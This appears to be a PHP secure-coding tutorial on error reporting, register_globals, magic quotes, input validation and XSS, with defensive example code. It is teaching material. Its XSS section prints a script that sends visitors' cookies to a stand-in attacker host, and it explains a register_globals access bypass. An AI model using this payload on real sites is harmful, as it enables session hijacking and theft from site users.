Oct 12

Create Secure PHP Applications

Error Reporting

When you take an application live, make sure that PHP error messages are no longer displayed to visitors. Warnings and notices reveal file paths, database and table names and fragments of SQL that an attacker can use, so in production errors should be written to a log and the visitor should only see a generic page. The error_reporting() call controls which errors PHP reports at all; the display_errors and log_errors directives control where they go.


The default error_reporting setting shipped with php.ini reports everything except notices:

error_reporting(E_ALL ^ E_NOTICE);   // E_ALL & ~E_NOTICE is the more usual spelling; both remove E_NOTICE from the mask

You can also set the level of reporting to suit the stage of development:

Report simple running errors
error_reporting(E_ERROR | E_WARNING | E_PARSE);

Reporting E_NOTICE as well is good practice (it reports uninitialised variables and catches variable name misspellings)
error_reporting(E_ERROR | E_WARNING | E_PARSE | E_NOTICE);

Report all PHP errors
error_reporting(E_ALL);
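The production configuration described above, written out as an added example (this is not code from the original post). It assumes a log file at /var/log/php/app.log that the web server user can write to; the function and handler names are my own.

```php
<?php
// Production error settings. Added example, not code from the original post.
// Assumption: /var/log/php/app.log exists and is writable by the web server user.

error_reporting(E_ALL);                 // report everything to us ...
ini_set('display_errors', '0');         // ... but never render it into the response
ini_set('log_errors', '1');
ini_set('error_log', '/var/log/php/app.log');

// Turn every reportable error into a log line plus a generic page. Fatal errors
// (E_ERROR, E_PARSE) never reach a user handler, so display_errors=0 above is
// what keeps those out of the browser.
function production_error_handler($errno, $errstr, $errfile, $errline)
{
    if (!(error_reporting() & $errno)) {
        return false;                   // suppressed with @; let PHP handle it
    }
    error_log(sprintf('PHP error %d: %s in %s:%d', $errno, $errstr, $errfile, $errline));
    if ($errno === E_USER_ERROR) {
        if (!headers_sent()) {
            header('HTTP/1.1 500 Internal Server Error');
        }
        exit('An internal error occurred. It has been logged.');
    }
    return true;                        // handled: do not fall through to the built-in handler
}
set_error_handler('production_error_handler');

// The same policy as php.ini directives, and as .htaccess lines under mod_php:
//   display_errors = Off                    php_flag  display_errors off
//   log_errors     = On                     php_flag  log_errors on
//   error_log      = /var/log/php/app.log   php_value error_log /var/log/php/app.log
```

Keep error_reporting(E_ALL) in production as well as in development: lowering it hides problems from the log, not from the attacker. The only setting that should differ between the two is display_errors.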

Disable PHP’s “Bad Features”

Some PHP features make life easier for the developer, but a few of these conveniences have unintended consequences. The ones below were deprecated in PHP 5.3 and removed in PHP 5.4, yet they are ubiquitous in PHP 4 applications and many PHP 5 hosts still ship with them switched on, so you have to check for them.

Register Globals (register_globals)

register_globals was meant to help rapid application development, and it must be off in a live application. With it on, a request such as script.php?var=1 makes the value available as $var instead of only as $_GET['var']. This might sound useful, but every variable in the script now has this property: anything a user puts in the query string, POST body or cookies becomes a global variable before your code runs, and we can easily get into PHP applications that do not protect against this.

Some example code
if (isset($_POST['xbutton']) && $_POST['xbutton'] == 'test') { $access = 1; }
if ($access) { /* privileged code: ?access=1 in the URL reaches here when register_globals is on */ }

If register_globals is on, a user only has to add access=1 to the query string to reach the privileged code, because $access is created from the request before the script starts. For the same reason register_globals cannot be switched off from within the script (the globals are already populated when your first line runs). Under Apache with mod_php you can disable it for a directory with the following .htaccess line:

php_flag register_globals 0
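The access check from the text and a defensive rewrite of it, as an added example (not code from the original post). The variable names match the text; the hardening steps are my own.

```php
<?php
// Added example, not code from the original post: the access check that
// register_globals breaks, followed by the same check written defensively.

// --- vulnerable: top-level code, which is where register_globals injects variables ---
// $access is assigned only inside the branch, so the author assumes it is unset
// otherwise. With register_globals=On, a request to script.php?access=1 creates
// $access = "1" before this code runs, and the privileged branch is reached with
// no form submission at all.
if (isset($_POST['xbutton']) && $_POST['xbutton'] == 'test') {
    $access = 1;
}
if (!empty($access)) {
    // privileged code
}

// --- hardened ---
// 1. Refuse to run with the setting on. ini_get() returns "" or "0" for off
//    and "1" for on, so a plain truth test is enough.
if (ini_get('register_globals')) {
    header('HTTP/1.1 500 Internal Server Error');
    exit('This application requires register_globals = Off');
}

// 2. Initialise every state variable before the code that may set it, and
//    compare strictly, so a value injected from the request can never stand in
//    for an assignment your code did not make.
$access = 0;
if (isset($_POST['xbutton']) && $_POST['xbutton'] === 'test') {
    $access = 1;
}
if ($access === 1) {
    // privileged code
}

// 3. Read input only through the superglobals ($_GET, $_POST, $_COOKIE), never
//    through bare variable names, and turn the feature off for the whole tree
//    in .htaccess (mod_php; the directory needs AllowOverride Options):
//        php_flag register_globals off
```

Step 2 is the one that matters even after the setting is gone: code that relies on a variable being undefined is fragile under include() and copy-paste as well as under register_globals.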

Magic Quotes (magic_quotes_gpc, magic_quotes_runtime, magic_quotes_sybase)

Magic quotes cause several problems. First, they clash with addslashes(): if both are in effect, input is escaped twice and you end up with doubled backslashes in the database or on the page. Second, if you assume magic quotes is on and it actually is not, all input goes through unchecked. Third, magic_quotes_gpc only escapes single quotes, double quotes, backslashes and NUL bytes, which is the right set for MySQL string literals but not for every database engine (nor for LIKE patterns, shell commands or HTML), so other characters still need escaping for their context. The recommendation is therefore to disable the feature and use proper input validation, with escaping done explicitly for the context the data goes into.

magic_quotes_gpc, like register_globals, cannot be disabled from the script, because the request data has already been mangled before the script starts; magic_quotes_runtime can be changed at runtime, but it is simplest to turn both off in .htaccess:

php_flag magic_quotes_gpc 0
php_flag magic_quotes_runtime 0
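When the host leaves magic_quotes_gpc on and you cannot change it, the usual remedy is to undo it at the start of every request and move escaping into the database layer. The following is an added example, not code from the original post; it assumes a MySQL database with a table users(name, email) and the connection details shown.

```php
<?php
// Added example, not code from the original post. Undo magic quotes at the top
// of the request so the rest of the code sees the raw input; escaping then
// belongs to the database driver, which knows its own rules. Assumed: a PDO
// connection to a MySQL database with a table users(name, email).

function strip_magic_quotes_recursive($value)
{
    return is_array($value)
        ? array_map('strip_magic_quotes_recursive', $value)
        : stripslashes($value);
}

// get_magic_quotes_gpc() always returns false from PHP 5.4 on and was removed
// in PHP 8.0, so guard the call; on PHP 8 the whole block is skipped.
if (function_exists('get_magic_quotes_gpc') && @get_magic_quotes_gpc()) {
    $_GET     = strip_magic_quotes_recursive($_GET);
    $_POST    = strip_magic_quotes_recursive($_POST);
    $_COOKIE  = strip_magic_quotes_recursive($_COOKIE);
    $_REQUEST = strip_magic_quotes_recursive($_REQUEST);
}

// magic_quotes_runtime, unlike _gpc, can be changed from the script; ini_set()
// simply returns false on versions where the directive no longer exists.
ini_set('magic_quotes_runtime', '0');

// With the input clean, let the driver quote it. A bound parameter is sent
// separately from the SQL text, so O'Brien or ' OR 1=1 -- cannot change the query.
function find_user_by_name(PDO $pdo, $name)
{
    $stmt = $pdo->prepare('SELECT name, email FROM users WHERE name = :name');
    $stmt->execute(array(':name' => $name));
    return $stmt->fetch(PDO::FETCH_ASSOC);
}

// Assumed connection details. EMULATE_PREPARES=false makes the MySQL server
// itself bind the parameter instead of the client interpolating it.
$pdo = new PDO('mysql:host=localhost;dbname=app;charset=utf8', 'app', 'secret', array(
    PDO::ATTR_EMULATE_PREPARES => false,
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
));
$user = find_user_by_name($pdo, isset($_GET['name']) ? $_GET['name'] : '');
```

The stripslashes() pass only restores the input to what the user sent; it does not make it safe. Safety comes from the prepared statement for SQL and from context-specific escaping everywhere else.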

Validate Input

Better than escaping characters is to validate input: you know what kind of data you expect, so you can make sure users can only submit data of that shape and reject everything else. For example, suppose we accept a month as one or two digits (1-12), a day as one or two digits (1-31) and a year as four digits (YYYY):

if ( ! preg_match( "/^[0-9]{1,2}$/", $_GET['month'] ) ) {
    // handle error
}
if ( ! preg_match( "/^[0-9]{1,2}$/", $_GET['day'] ) ) {
    // handle error
}
if ( ! preg_match( "/^[0-9]{4}$/", $_GET['year'] ) ) {
    // handle error
}
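The checks above only constrain the shape of each field; they still accept month 99, day 00 and a trailing newline (in PCRE, $ matches before a final newline). The following added example (not code from the original post; the function name is my own) turns them into a validator that also enforces the calendar ranges and fails closed.

```php
<?php
// Added example, not code from the original post: a whitelist validator for the
// month/day/year fields above. It returns the three values as integers, or null
// for anything that is not a real calendar date, so the caller can fail closed.

function validate_date($month, $day, $year)
{
    // ?month[]=1 turns $_GET['month'] into an array; preg_match() on an array
    // warns (or throws on PHP 8), so reject non-strings first.
    foreach (array($month, $day, $year) as $v) {
        if (!is_string($v)) {
            return null;
        }
    }
    // $ alone matches before a final "\n", so "12\n" would pass; the D modifier
    // makes $ match only at the very end of the string.
    if (!preg_match('/^[0-9]{1,2}$/D', $month) ||
        !preg_match('/^[0-9]{1,2}$/D', $day)   ||
        !preg_match('/^[0-9]{4}$/D',   $year)) {
        return null;
    }
    $m = (int) $month;
    $d = (int) $day;
    $y = (int) $year;
    // The regexes still accept month 00 or 99 and day 31 in February;
    // checkdate() enforces the real ranges, including leap years.
    if (!checkdate($m, $d, $y)) {
        return null;
    }
    return array($m, $d, $y);
}

// Request handling: anything that is not a valid date gets a 400 and nothing else runs.
$date = validate_date(
    isset($_GET['month']) ? $_GET['month'] : '',
    isset($_GET['day'])   ? $_GET['day']   : '',
    isset($_GET['year'])  ? $_GET['year']  : ''
);
if ($date === null) {
    header('HTTP/1.1 400 Bad Request');
    exit('Invalid date');
}
list($month, $day, $year) = $date;
// From here on $month, $day and $year are integers in known ranges and can be
// used in a query or a file name without further escaping.
```

The pattern generalises to every field: decide what a valid value looks like, accept exactly that, and convert it to a typed value before it is used anywhere.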

XSS (Cross Site Scripting)

The essence of any XSS attack is the injection of code (usually JavaScript, but it can be any client-side code) into the output of your PHP script. The attack is possible whenever you display input that was sent to you, as you do with a forum posting.

For example, if your application includes a forum in which people post messages for other users to read, a malicious user can embed a <script> tag like the one below. When another user views the post, the script sends that user's cookies (and with them the session identifier) as GET parameters to a server the attacker controls; the attacker's page can then redirect back to your site so that nothing appears to have happened. The attacker thereby collects other users' cookie and session information and uses it for session hijacking or other attacks on your site.


<script>
document.location = 'http://www.badguys.com/cgi-bin/cookie.php?' + document.cookie;
</script>

One protection against this is to disallow HTML altogether, by passing every piece of user-supplied data through htmlspecialchars() when you output it: if no tag survives, there is no way for JavaScript to execute. This also removes all formatting, however, which is not always an option for forum and blog software. In that case allow a small whitelist of markup that you translate into HTML yourself, and never let user-written tags through.
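Both approaches together, as an added example (not code from the original post): escape everything on output, then re-enable a few formatting markers. The helper names and the [b]/[i]/[url] syntax are my own choices; the sample post is constructed and carries the cookie-stealing script from the text.

```php
<?php
// Added example, not code from the original post: escape everything a user
// submitted when it is output, then re-enable a small whitelist of formatting
// markers, so a forum keeps bold, italics and links without ever letting
// user-supplied HTML or JavaScript reach the browser as markup.

// Escape for HTML text and attribute contexts. ENT_QUOTES also converts the
// single quote, so the result is safe inside value='...' as well as value="...".
function e($text)
{
    return htmlspecialchars($text, ENT_QUOTES, 'UTF-8');
}

// Render a post. Every < > & " ' from the user is neutralised by e() first;
// only the markers [b], [i] and [url] are then translated into fixed HTML that
// we wrote ourselves. Because $html is already escaped, the captured pieces
// can be placed inside tags and attributes without a second round of escaping
// (a second e() would turn &amp; into &amp;amp;).
function render_post($body)
{
    $html = e($body);
    $html = preg_replace('#\[b\](.*?)\[/b\]#s', '<strong>$1</strong>', $html);
    $html = preg_replace('#\[i\](.*?)\[/i\]#s', '<em>$1</em>', $html);
    // Links: only http or https targets, no whitespace or brackets, so
    // javascript: URLs and attribute break-outs are impossible.
    $html = preg_replace(
        '#\[url\](https?://[^\s\[\]]+)\[/url\]#i',
        '<a href="$1" rel="nofollow">$1</a>',
        $html
    );
    return nl2br($html);
}

// Constructed sample post (not from a real site), carrying the payload from the text:
$post = "Hi [b]all[/b], see [url]http://example.com/?a=1&b=2[/url]\n"
      . "<script>document.location='http://www.badguys.com/cgi-bin/cookie.php?'+document.cookie</script>";
echo render_post($post);
```

The script element in the sample arrives in the page as &lt;script&gt;…&lt;/script&gt;: visible text, not executed markup, while the [b] and [url] markers become a <strong> and an <a> that we produced. e() is only correct for HTML text and attribute contexts; a value placed inside a JavaScript string, a URL parameter or a CSS property needs the encoder for that context.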
